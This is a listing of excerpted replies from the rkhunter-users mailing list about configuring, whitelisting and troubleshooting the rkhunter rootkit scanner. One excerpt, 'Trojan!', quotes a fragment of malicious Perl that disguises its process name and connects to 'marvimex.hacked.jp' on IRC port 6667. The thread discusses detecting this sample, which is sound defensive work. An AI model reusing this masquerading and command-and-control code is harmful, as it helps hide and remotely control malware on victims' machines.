Re: [Rkhunter-users] Installation Error (INSTALLDIR)

2010-05-25 Thread John Horne
ikipedia shows it on > > http://en.wikipedia.org/wiki/Rkhunter > Wow. Didn't know there was a wikipedia entry! :-) However it lists it as the 'Old rkhunter web page'. See the official web page at the bottom

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread John Horne
On Tue, 2010-05-25 at 09:34 -0700, Duane Loftus wrote: > OK, time for dumb questions. > > 1. John Horne says: It hasn't installed properly, try re-installing. > The INSTALLDIR option must exist for RKH to run. > > Is there any guidance on re-installing? > Yes, look in

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-25 Thread John Horne
KH, then send us the output of the installer. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-26 Thread John Horne
ackage manager option. FC6 won't be updated anymore, so all the current package files should correspond to their entries in the RPM database. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

2010-05-27 Thread John Horne
' config file ('/etc/rkhunter.conf.local'). This way when you next upgrade RKH, you do not have to modify the newly installed rkhunter.conf as all your settings will be in your local file. John. -- John Horne, University of Plymouth

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread John Horne
alone, and then run RKH. Then only modify those options which cause a warning, everything else will be automatically detected. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587

Re: [Rkhunter-users] ssh protocol 1

2010-05-27 Thread John Horne
es not need option 'Protocol' to be set? > No. From the config file: ...If the 'Protocol' option has not been set in the SSH # configuration file, then a value of '2' may be set here in order to # suppress a warning message. So set it to '2

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread John Horne
When RKH runs it will look at '/etc/rkhunter.conf', but will then look at '/etc/rkhunter.conf.local' (if it exists) and override any previously set options. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread John Horne
-147 lib]# more random-seed > You can't list it (using 'more'), because it is a binary/data file not a text file. See the 'file' command for help on that. John. -- John Horne, University of Plymouth, UK Tel: +4

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread John Horne
run 'rkhunter --update --propupd' as I said? If not, then do it now. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-27 Thread John Horne
h '--propupd', then changed the config to use the package manager ('PKGMGR=RPM'). This would then make your current file properties report many warnings. If you change the config to use, or not use, the package manager for checks, then you must run 'rkhunter --propupd'

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

2010-05-27 Thread John Horne
> A default install will put the rkhunter command into /usr/local/bin. So the full pathname should be '/usr/local/bin/rkhunter'. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

2010-05-27 Thread John Horne
John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-28 Thread John Horne
t from lsmod, and found nothing in /proc/modules. For Fedora I would expect some modules to be loaded. However, if that is how your system runs (possibly due to plesk?), then you can disable the test. Copy the DISABLED_TESTS line from /etc/rkhunter.conf, and paste it into /etc/rkhunter.conf.local.

Re: [Rkhunter-users] whitelisting a setgid directory?

2010-05-30 Thread John Horne
bitch. > As far as I am aware rkhunter doesn't care whether a directory has the setgid bit set or not. I would say, leave the above ALLOWHIDDENDIR option in your config file, and reset the permissions on the directory. John. -- John Horne, Univers

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora

2010-05-30 Thread John Horne
isable the 'apps' test completely. 2) Whitelist each of the applications - for example: APP_WHITELIST="httpd named openssl" 3) Install more up to date versions of the applications. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

2010-05-31 Thread John Horne
go by the colour of the test result. If it's not red then don't worry about it. The skipped tests will be yellow simply to indicate that you may want to install the re

Re: [Rkhunter-users] rkhunter 1.3.6 / Red Hat Fedora]

2010-06-01 Thread John Horne
red. > Run rkhunter ('rkhunter -c') directly from a terminal, physical console or xterm. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] whitelisting a setgid directory?

2010-06-01 Thread John Horne
On Tue, 2010-06-01 at 22:33 +0100, Adam McGreggor wrote: > On Sun, May 30, 2010 at 10:07:40PM +0100, John Horne wrote: > > On Sun, 2010-05-30 at 21:27 +0100, Adam McGreggor wrote: > > > I have a directory, /etc/.svn, which is setgid (2775/drwxrwsrx). > > > >

Re: [Rkhunter-users] Request: please build me a RPM on a 64-bit machine

2010-06-09 Thread John Horne
> 32-bit system. Any x86_64 /usr/lib64 probs should have been gone > long time ago, our build process doesn't default to /usr/lib64 > (should be /usr/local anyway), so I'm looking for confirmation this > is a RPMForge packager problem. > Hi, The file will be on its way

Re: [Rkhunter-users] Warning about suspscan directory

2010-06-10 Thread John Horne
You could just set it to something like /var/tmp. However, I think /dev/shm was used because it is memory-resident, and so less intensive for the test. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Warning when scanning /dev/shm

2010-06-16 Thread John Horne
't like the colon (:) characters. Already fixed in the CVS version though. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Warning when scanning /dev/shm

2010-06-16 Thread John Horne
Alternative is to use the current CVS version of rkhunter. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] High CPU usage

2010-06-24 Thread John Horne
w the server's CPU usage going up and down regularly. In that respect I have gotten used to it, and the users don't seem to notice it. Obviously if the usage stays high (or low!), then it is investigated. John. -- John Horne, University of Ply

Re: [Rkhunter-users] rkhunter actually running commands in the files check section

2010-07-08 Thread John Horne
unning RKH with '--debug' might have indicated why. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

2010-07-11 Thread John Horne
ific files. (In your case it would be the 'hdparm' string in the /etc/rc.d/rc.sysinit and bootlogd files. This means you don't have to whitelist the files from all rootkit checks.) At the moment you will have to whitelist the files

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

2010-07-12 Thread John Horne
atever command you use to run rkhunter and add the '--debug' option to it please. Then email me the resulting output file in /tmp. Also can you email me the log file (usually /var/log/rkhunter.log). Thanks, John.

Re: [Rkhunter-users] Warnings after upgrading to Mandriva 2010.1 and rkhunter 1.3.6

2010-07-13 Thread John Horne
of the whitelisting options are allowed to be specified more than once. I'll email you a drop-in corrected version of the 'rkhunter' program (it will still be version 1.3.6), that will allow your configuration above. It also contains the fix for the Mandriva 'rkhunter /b

Re: [Rkhunter-users] rkhunter actually running commands in the files check section

2010-07-15 Thread John Horne
looks as if the program ran. The 'lsmod' command starts with a header line containing 'Module', and 'ipv6' and 'nf_conntrack_ipv4' are certainly module names. What I would like to see is the rkhunter log file for this, or better still output from a run when the

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread John Horne
n email me the log file (/var/log/rkhunter.log). Thanks. > > I figure that maybe I need to run rkhunter --propupd > Nope, that's got nothing to do with it. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread John Horne
un 'rkhunter --debug --version' and then email me (not the list) the file that is created in /tmp (named rkhunter-debug...). It should contain enough info to see what is going on. John. -- John Horne Tel: +44 (0)1752 587287 Univers

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread John Horne
it does. If you really want to specify exactly what should be checked, and what shouldn't, then maybe something like Aide or Tripwire would be more suitable. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread John Horne
directories will be searched as well. Option 'b' can be achieved by setting USER_FILEPROP_FILES_DIRS="/usr/local/libexec", again other directories will be searched. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] error: awk required for rkhunter but awk is present

2010-08-11 Thread John Horne
On Wed, 2010-08-11 at 16:25 -0700, Jonny Kent wrote: > > > > err maybe that is a new flag. where is USER_FILEPROP_FILES_DIRS > documented? so I can't answer you fully. > Sorry, that was added in at version 1.3.6. Your original post said you were running 1.3.4 I th

Re: [Rkhunter-users] Lock File Error

2010-08-18 Thread John Horne
art). By default it is not enabled, so you must have set USE_LOCKING=1 in the config file. To remove the lock file simply run: rkhunter --unlock John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Lock File Error

2010-08-19 Thread John Horne
On Wed, 2010-08-18 at 20:07 -0400, Mike Strickland wrote: > On Wed, 2010-08-18 at 21:35 +0100, John Horne wrote: > > This is rkhunter's locking mechanism to prevent 2 or more instances of > > RKH running together (and so messing up the log file for a start). By > > def

Re: [Rkhunter-users] Lock File Error

2010-08-19 Thread John Horne
t is waiting for the lock, and show a count of the number of seconds in increments of 10 seconds. It will wait a maximum of 300 seconds (5 mins), but that is configurable. After that time it gives up. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287

Re: [Rkhunter-users] Burning rkhunter.dat to a CD and linking to file gives error

2010-08-21 Thread John Horne
On Sat, 2010-08-21 at 16:30 -0700, Conrad Schuler wrote: > In the rkhunter.conf file it says to burn the rkhunter.dat to a CD and > link to it. > ?? Where on earth does it say that? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)17

Re: [Rkhunter-users] Running processes false warning?

2010-09-09 Thread John Horne
'system'. > The test is for complete file names, not partial matches - so '.../system' matches, but '.../system_bus_socket' will not. Without seeing the lsof output, which has obviously changed by now, it is impossible to say what was matched. The test has been improve

Re: [Rkhunter-users] Running processes false warning?

2010-09-13 Thread John Horne
On Mon, 2010-09-13 at 02:59 +0300, Nerijus Baliunas wrote: > On Thu, 09 Sep 2010 10:21:56 +0100 John Horne > wrote: > > > The test is for complete file names, not partial matches - so > > '.../system' matches, but '.../system_bus_socket' will not. With

Re: [Rkhunter-users] Running processes false warning?

2010-09-13 Thread John Horne
On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote: > On Mon, 13 Sep 2010 11:56:03 +0100 John Horne > wrote: > > > > I have similar problem with wine. When there are no wine apps running, > > > I get no warning, but with wine running I get the warning.

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

2010-09-14 Thread John Horne
) Seen by sched_rr_get_interval() # ps p 13864 PID TTY STAT TIME COMMAND # unhide.rb|wc -l 3287 # unhide.rb|grep '^ Seen by ps'|wc -l 295 I only showed the last PID found, but as can be seen it says it has found 295 suspicious PIDs. J

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

2010-09-16 Thread John Horne
On Thu, 2010-09-16 at 17:29 +0200, unsp...@hushmail.com wrote: > Hello John, > > On Tue, 14 Sep 2010 15:59:39 +0200 John Horne > wrote: > >I seem to get quite a few FP's from this: > > Do those still occur after using Walles' fix posted on SF? > No, th

Re: [Rkhunter-users] USER_FILEPROP_FILES_DIRS file generates complaint

2010-09-18 Thread John Horne
d for file '/usr/local/bin/perl' in the > rkhunter.dat file. > What are the other values of USER_FILEPROP_FILES_DIRS you have configured? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)

Re: [Rkhunter-users] Unhide testers wanted for Ruby version

2010-09-18 Thread John Horne
hide sys" output is : > "HIDDEN Processes Found: number_of_hidden_processes" > Thanks for reporting this. It has been fixed in the next release. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] USER_FILEPROP_FILES_DIRS file generates complaint

2010-09-21 Thread John Horne
rom the RKH config file: # NOTE: Only files and directories which have been added by the user, # and are not part of the internal lists, can be excluded. So, for # example, it is not possible to exclude the 'ps' command by using # '!/bin/ps'. These will be silently ignore

Re: [Rkhunter-users] Running processes false warning?

2010-09-23 Thread John Horne
On Mon, 2010-09-13 at 14:14 +0300, Nerijus Baliunas wrote: > On Mon, 13 Sep 2010 11:56:03 +0100 John Horne > wrote: > > > > I have similar problem with wine. When there are no wine apps running, > > > I get no warning, but with wine running I get the warning.

Re: [Rkhunter-users] whitelisting files using deleted files

2010-09-27 Thread John Horne
is whitelisted > > Am I missing anything? Do I have to whitelist apache2 with no specified > file? Any suggestion? > What have you put into the RKH config file for this? John. -- John Horne, Universit

Re: [Rkhunter-users] whitelisting files using deleted files

2010-09-28 Thread John Horne
On Tue, 2010-09-28 at 10:26 +0200, William Maddler wrote: > On 27/09/2010 23:47, John Horne wrote: > > On Mon, 2010-09-27 at 12:53 +0200, William Maddler wrote: > >> Hello, > >> I keep getting a warning for apache2 using deleted files: > >> > >> [12:01

Re: [Rkhunter-users] Pass individual files to propupd option

2010-10-21 Thread John Horne
On Thu, 2010-10-21 at 13:05 +0200, Leon Waldman wrote: > > Can any one tell me if it's possible to pass individual > filenames/paths to the propupd option? > Yes it is if you are running version 1.3.6. Look at the man page. John. -- John Horne, University of Plymouth, UK

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-10-31 Thread John Horne
' letter, and not the same as the lowercase 'c' letter which is short for the '--check' option. Using '-C' (or '--checkconfig') simply runs through the configuration files and checks that they look okay, it then exits. It will not display anything if all

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-01 Thread John Horne
s 'head -1 /var/lib/rkhunter/db/i18n/en' show? John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-01 Thread John Horne
that instance RKH looks in the config file to see what tests are enabled, which by default is 'all'. When running specific tests I tend to just use: rkhunter --enable hidden_procs That is all that is required. If more than one test is to run, then just comma-separate them or use mult

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-02 Thread John Horne
On Tue, 2010-11-02 at 06:34 +0100, Patrick Gouin wrote: > Le 01/11/2010 18:51, John Horne a écrit : > > On Mon, 2010-11-01 at 17:02 +0100, Patrick Gouin wrote: > > > > Okay, but why does your path have a directory name with a trailing '/'? > > I'

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-02 Thread John Horne
[ Found ] > [20:21:27] Info: Found syslog configuration file: /etc/syslog.conf > > RKH should probably look only for the config file corresponding to > the syslog utility it found just before. > I don't quite follow this. Are you saying: 1) that /etc/syslog.conf is a symbol

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-03 Thread John Horne
unning? > > > > > That's exactly what I mean except I would have written check instead of > show.. > Okay, I'll take a look and see if we can do something. John. -- John Horne, University of Plym

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-04 Thread John Horne
s, but I'll save them for a separate email and if I run > into any further issues I'll be back. > Okay, thanks again. One point, OS X does not have a /dev/shm directory, so if you want to run 'suspscan', then I tend to use: SUSPSCAN_TEMP=/var/lib/rkhunter/tmp or wherever y

Re: [Rkhunter-users] Please test rkhunter-CVS.tar.gz

2010-11-05 Thread John Horne
it is doing. We should probably add 'launchd' itself to the list of monitored files for OS X as well (if we haven't already). John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Boonana Trojan

2010-11-05 Thread John Horne
ux/UNIX exploit with Boonana, only OS X and MS Windows. As such, at the moment, Boonana is only tested for on OS X. Obviously, anyone with any Linux/UNIX details, then please let us know :-) John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax

Re: [Rkhunter-users] OSX passwd file (was eliminate Dica-Kit Rootkit)

2010-11-05 Thread John Horne
ver, OS X does not generally use the file. Passwords are maintained in a database, and not the passwd file. As far as I could gather the file *may* be used in some instances when sorting out problems with the machine. In that respect, it is not a full check of the user passwords, but may well be bet

[Rkhunter-users] Update for 1.3.8

2010-11-17 Thread John Horne
Hello, If you have installed the new release of rkhunter (1.3.8), would you ensure you run 'rkhunter --update' after installation please. One of the data files had a small error in it which has now been corrected. Thanks, John. -- John Horne Tel: +44 (0)1

Re: [Rkhunter-users] Update for 1.3.8

2010-11-17 Thread John Horne
uration option: Invalid directory found: ./ > > > > Could you help me? > > The BINDIR option, if not set on the command-line or in the config file, will use the root PATH variable. In this instance it seems the user has a relative path in PATH, and that is what RKH is complaining abou

Re: [Rkhunter-users] rkh 1.3.8 ignores processes allowed to use deleted files

2010-11-20 Thread John Horne
; Any ideas please? > I can't see anything obviously wrong. Can you run: rkhunter --enable deleted_files --debug and email me the debug file created in /tmp. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkh 1.3.8 ignores processes allowed to use deleted files

2010-11-20 Thread John Horne
On Sat, 2010-11-20 at 16:30 +, John Horne wrote: > On Sat, 2010-11-20 at 14:17 +, Dick Gevers wrote: > > Hi, > > > > 1.3.8 works fine for me. Thanks for the latest version! > > > > Except it says in the logs: > > > > [23:51:10] Info: Sta

Re: [Rkhunter-users] Warning: Application 'gpg', version '1.4.10', is out of date, and possibly a security risk.

2010-11-21 Thread John Horne
ions of RKH. New versions were released to coincide with 1.3.8 being released. As such users of 1.3.6 (and before) may well see results different from previously if they have run 'rkhunter --update' bec

Re: [Rkhunter-users] Ports checked questions

2010-11-29 Thread John Horne
le hidden_ports" but in my case that gave me: > "Info: Unable to find the 'unhide-tcp' command" > Exactly. If your system doesn't have the unhide-tcp command then the check cannot run. It is disabled by default because most people won't have that command in

Re: [Rkhunter-users] rkhunter does not check /bin/ping ?

2010-11-29 Thread John Horne
R_FILEPROP_FILES_DIR option. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter does not check /bin/ping ?

2010-12-02 Thread John Horne
ss it's already known much longer, because i read an article about it, > in a "hackin9"-magazine from 2004! > Ping now added into CVS version. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)17

Re: [Rkhunter-users] Can't whitelist deleted files + Package manager verification

2010-12-02 Thread John Horne
tem will re-prelink the files, and then the verification will pass. Alternatively, do as RKH suggests, run the 'prelink' command on the files - or use 'prelink -a' - and that should take care of it. Or you could disable prelinking completely of course. John. -- Joh

Re: [Rkhunter-users] compair rkhunter.log with rkhunter.log.old

2010-12-15 Thread John Horne
ecause of the timestamp. The only thing I can suggest is to do a comparison with the timestamps removed. Something like:
cat rkhunter.log | cut -d' ' -f2- >/tmp/rkh1
cat rkhunter.log.old | cut -d' ' -f2- >/tmp/rkh2
diff /tmp/rkh1 /tmp/rkh2
It is not ideal, but usable.

Re: [Rkhunter-users] compair rkhunter.log with rkhunter.log.old

2010-12-15 Thread John Horne
summary). > You can combine options to get just the summary. Try using '-q --summary'. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Can't disable hidden_procs test

2010-12-21 Thread John Horne
s > > which is clearly conflicting. > No it's not. That is the 'hidden_ports' test. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Run rkhunter on a remote machine

2011-01-11 Thread John Horne
ly. As far as I am aware RKH has no '--file' option. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Static IP for updating RKHunter

2011-01-17 Thread John Horne
On Mon, 2011-01-17 at 11:33 -0500, James R. Marcus wrote: > Some of my machines are behind a strict firewall, is there a recommended > single mirror for RKHunter updates? > rkhunter.sourceforge.net John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +4

Re: [Rkhunter-users] installed RKH on mac os x 10.6.6 possible RK?

2011-01-25 Thread John Horne
sh/sshd_config most other OSes use? > Yes, OSX does use /etc/sshd_config. It will be necessary to add to the users config file: RTKT_FILE_WHITELIST=/etc/sshd_config John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1

Re: [Rkhunter-users] installed RKH on mac os x 10.6.6 possible RK?

2011-01-25 Thread John Horne
On Tue, 2011-01-25 at 12:18 -0500, d...@456ny.com wrote: > appreciate the response. > > how do i attach the log. > i cannot even locate the log file within osx > The log file path is by default /var/log/rkhunter.log John. -- John Horne, University of Plymouth, UK Tel: +44

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

2011-02-04 Thread John Horne
On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote: > Hello, > > I'm running rkhunter under FreeBSD. I have done so for many years. > After upgrading to rkhunter version 1.3.8, > Did you run 'rkhunter --propupd' after upgrading? John. -- John Horne

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

2011-02-04 Thread John Horne
On Fri, 2011-02-04 at 14:03 +0100, Torfinn Ingolfsen wrote: > Hi, > > On Fri, Feb 4, 2011 at 12:36 PM, John Horne wrote: > > On Fri, 2011-02-04 at 11:24 +0100, Torfinn Ingolfsen wrote: > >> Hello, > >> > >> I'm running rkhunter under FreeBSD. I ha

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

2011-02-04 Thread John Horne
On Fri, 2011-02-04 at 17:58 +0100, Torfinn Ingolfsen wrote: > Hi, > > > On Fri, Feb 4, 2011 at 2:58 PM, John Horne wrote: > > Do you use the USER_FILEPROP_FILES_DIRS option at all in your config > > file(s)? If so can you show me what they are. > > I use the confi

Re: [Rkhunter-users] ALLOWDEVFILE (and others) with spaces in filenames?

2011-02-06 Thread John Horne
at the lists of filenames as newline delimited, but that would then mean that users would have to enter each file on a separate line in the config file (whereas at present they can use space-separated lists). In answer to Kevin, as far as I can tell it is not possible to include a filenam

Re: [Rkhunter-users] rkhunter on FreeBSD, complains about /etc/passwd

2011-02-06 Thread John Horne
get their servers back up and running then the link should work again. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Trojan!

2011-02-22 Thread John Horne
; -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]"); > my $processo = $ps[rand scalar @ps]; > > $servidor='marvimex.hacked.jp' unless $servidor; > my $porta='6667

Re: [Rkhunter-users] All file hash checks will be skipped(...)

2011-02-28 Thread John Horne
m (or md5, sha1) commands in the root PATH. If they are not found, then rkhunter will use its own sha1/md5 perl function but only if perl is available. Can you run 'rkhunter --list perl' please. If it shows the Digest::MD5 and SHA1 modules installed, then can you check that the p

Re: [Rkhunter-users] All file hash checks will be skipped(...)

2011-02-28 Thread John Horne
On Mon, 2011-02-28 at 01:22 +0100, Boris Cuber wrote: > (Btw., md5sum _is_ in the root path) > Sorry, just noticed this bit. Look in the /var/log/rkhunter.log file and ensure that the PATH used by RKH is what you expect it to be (and that md5sum is in that path). John. -- John

Re: [Rkhunter-users] rkhunter changes ctime & mtime during "properties" checking

2011-03-01 Thread John Horne
mand I think). Yet on a non-prelinked system the mtime and ctime are unchanged but the atime is. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] sshd Rootkit not detected by rkhunter

2011-04-29 Thread John Horne
On Thu, 2011-04-21 at 16:25 +0200, Carlos Oliva wrote: > > I think a good add-on for rkhunter is inspect the MD5 of the packages, > Try the 'DPKG' package manager option in the config file. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax:

Re: [Rkhunter-users] About command options

2011-04-29 Thread John Horne
; root > === > > As a result, now have received notification by e-mail "warning" . > I want to receive which is not "[ Warning ]" message, but "[ Bad ]" message. > > how to achieve this? > > Generally you can't. The only way you could do th

Re: [Rkhunter-users] Propupd on Rootkit Hunter v. 1.3.8

2011-05-07 Thread John Horne
. What bug? John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] suspscan string in /dev

2011-05-07 Thread John Horne
> to see. I have commented out each prior to each string in hope not to > spread anything or cause any problems. They appear to be make or load > with some international connotation > Does the rkhunter log file not say which file it is found in? John. -- John Horne, University of

Re: [Rkhunter-users] Hidden ports found

2011-05-10 Thread John Horne
't tried this version myself, but the later versions offered more options which may provide more info. http://www.unhide-forensics.info/?Download John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] deleted_files test and IFS

2011-05-24 Thread John Horne
n. > Hello, Many thanks for this. The problem has already been fixed in the CVS version of rkhunter. John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter has been replaced and is not a script...

2011-06-01 Thread John Horne
give it a go and see if it fixes the problem. Thanks, John. -- John Horne, University of Plymouth, UK Tel: +44 (0)1752 587287 Fax: +44 (0)1752 587001

Re: [Rkhunter-users] rkhunter has been replaced and is not a script...

2011-06-02 Thread John Horne
will still monitor it for any future changes. If the fix for the 'file' command is included in a subsequent Fedora 'rkhunter' package, and you install that (via yum), then you should remove the config file option above and let the package manager revert to monitoring the progra

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

2011-06-15 Thread John Horne
ROP_FILES_DIRS="/usr/bin/mc68000 /usr/bin/mc68010 /usr/bin/mc68020 /usr/bin/mc68030 /usr/bin/mc68040 /usr/bin/m68k /usr/bin/sun2 /usr/bin/sun3 /usr/bin/sun3x /usr/bin/u370" Then run 'rkhunter --propupd'. John. -- John Horne Tel: +44 (0)1752 587287 University of

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

2011-06-15 Thread John Horne
g ] > /usr/ucb/file[ Warning ] > You will need to look in the log file (/var/log/rkhunter.log) to see why these warnings occur. John. -- John Horne Tel: +44 (0)1752 587287 University of Plymouth, UK Fax: +44 (0)1752 587001

Re: [Rkhunter-users] Rootkit "NSDAP " detected on Solaris10 sparc.

2011-06-15 Thread John Horne
lo, Yes, the SCRIPTWHITELIST option will whitelist commands which are scripts so use the lines above (they are included in the rkhunter.conf file just as examples). John. -- John Horne Tel: +44 (0)1752 587287 University

Re: [Rkhunter-users] rkhunter --propupd not working?

2011-06-27 Thread John Horne
[ Warning ] > [08:05:51] Warning: The file properties have changed: > myhost : Mon Jun 27, 08:17:25 : ~ > # > > Anyone got any idea what could be causing this? > Hello, What version of rkhunter are you using? Also can you show us the full log entry for one of the files

Re: [Rkhunter-users] rkhunter --propupd not working?

2011-06-27 Thread John Horne
On Mon, 2011-06-27 at 12:40 -0400, Tanstaafl wrote: > Thanks for the help John... > > On 2011-06-27 10:57 AM, John Horne wrote: > > What version of rkhunter are you using? > > 1.3.8 > > > Also can you show us the full log entry for one of the files with a

Re: [Rkhunter-users] rkhunter --propupd not working?

2011-06-28 Thread John Horne
On Tue, 2011-06-28 at 10:54 -0400, Tanstaafl wrote: > On 2011-06-27 5:24 PM, John Horne wrote: > > The stored time is the modification time on the file when '--propupd' > > was last used, not the time when '--propupd' was run. > > Ok, I guess I'm ju

Re: [Rkhunter-users] rkhunter --propupd not working?

2011-06-28 Thread John Horne
On Tue, 2011-06-28 at 14:26 -0400, Tanstaafl wrote: > On 2011-06-28 1:27 PM, John Horne wrote: > > When you run 'rkhunter --propupd' it creates a local database of the > > files to be monitored and records the modification date/time of each > > file. That date/time
